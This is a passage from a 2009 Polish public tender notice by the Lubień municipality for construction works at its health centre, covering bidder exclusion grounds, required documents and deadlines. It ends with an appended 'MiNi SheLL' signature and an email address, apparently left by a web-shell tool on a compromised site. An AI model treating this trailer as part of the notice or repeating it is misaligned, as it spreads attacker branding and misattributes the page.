4)	osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia , przestępstwo przeciwko prawom osób wykonujących pracę zarobkową , przestępstwo przekupstwa , przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 
5)	 spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia , przestępstwo przeciwko prawom osób wykonujących pracę zarobkową , przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
6)	spółki partnerskie , których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia , przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
7)	spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia , przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa , przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
8)	osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
9)	podmioty zbiorowe , wobec których sąd orzekł zakaz ubiegania się o zamówienia , na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
10)	 wykonawców , którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art.22 ust.1 pkt.1-4;
11)	 wykonawców, którzy wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji ;
12)	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
13)	 nie złożyli oświadczenia o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust.3 p.z.p.;
14)	nie wnieśli wadium, w tym również na przedłużony okres związania ofertą;
5.3.Wykonawcy ubiegający się o udzielenie zamówienia wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
5.4.W przypadku wyboru oferty wykonawców wspólnie  ubiegających się o wykonanie zamówienia , zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego , umowy regulującej współpracę tych wykonawców .
Umowa regulująca współpracę podmiotów składających wspólnie ofertę powinna zawierać m. in.:
a) określenie celu gospodarczego,
b) oświadczenia podmiotów o przyjęciu odpowiedzialności solidarnej,
c) wskazanie podmiotu, któremu powierza się prowadzenie spraw i reprezentację na zewnątrz (lidera);
d) oznaczenie czasu trwania umowy; wymaga się , aby czas trwania umowy był nie krótszy niż okres realizacji zamówienia oraz okres gwarancji i rękojmi ; 
e) zakaz zmian w umowie bez zgody zamawiającego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.1.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r- Prawo zamówień publicznych , zamawiający żąda następujących dokumentów: 
1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej , jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej , wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)	aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków , opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń , że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów o których mowa w § 1 ust.1 pkt.2,3i 5 składa dokument lub dokument wystawiony w kraju , w którym ma siedzibę lub miejsce zamieszkania ,potwierdzające odpowiednio, że :
a )	nie otwarto jego likwidacji , ani nie ogłoszono upadłości .,
b )	nie zalega z uiszczaniem podatków, opłat , składek na ubezpieczenie społeczne i zdrowotne albo ze uzyskał przewidziane prawem zwolnienie , odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c )	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
6.2	W celu potwierdzenia , że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda następujących dokumentów: 
1)	wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia , z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających ,że roboty te zostały wykonane należycie ,
2)	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń , którymi dysponuje lub będzie dysponował wykonawca ;
3)	pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń , jeżeli w wykazie , o którym mowa w pkt.3, wykonawca wskazał narzędzia i urządzenia , którymi będzie dysponował ;
4)	wykaz osób , którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia , wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nie czynności ;
5)	pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia , jeżeli w wykazie o którym mowa w pkt.4 wykonawca wskazał osoby , którymi będzie dysponował;
6)	 wykaz dokumentów stwierdzających ,że osoby, które będą uczestniczyć w wykonaniu zamówienia ,posiadają wymagane uprawnienia , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - uprawnienia budowlane kierownika budowy , uprawnienia kierowników robót , wpisy do  Okręgowej Izby Inżynierów Budownictwa . 
W przypadku składania oferty przez podmioty występujące wspólnie , wymagane w niniejszym postępowaniu dokumenty muszą być złożone przez każdy podmiot .
Dokumenty wymagane przez Zamawiającego składane są w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę tzn. zapisem -za zgodność z oryginałem - oraz podpisane przez osoby podpisujące ofertę. Kserokopie dokumentów potwierdza się w ten sposób na każdej ze stron kserokopii, gdyż kserokopia niepoświadczona za zgodność z oryginałem nie jest dokumentem.  Nie należy potwierdzać za zgodność z oryginałem pustych stron..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lubien.pl  BIP z przekierowaniem na www.wrotamalopolski.pl  w zakładce zamówienia publiczne i og.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.lubien.pl BIP.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2009 godzina 11:30, miejsce: Urząd Gminy Lubień 32-433 Lubień 50 p. nr 9  sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 16.04.2009.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Roboty budowlane obejmujące:
I. Wymianę pokrycia z blachy dachu na budynku Ośrodka Zdrowia w Lubniu;
II. Zagospodarowanie terenu koło Ośrodka Zdrowia w Lubniu;
III. Pochylnia i schody zewnętrzne przy Ośrodku Zdrowia;
IV. Obiekty małej architektury i ogrodzenie terenu przy budynku nr 515 w Lubniu;

Creat By MiNi SheLL
Email: jattceo@gmail.com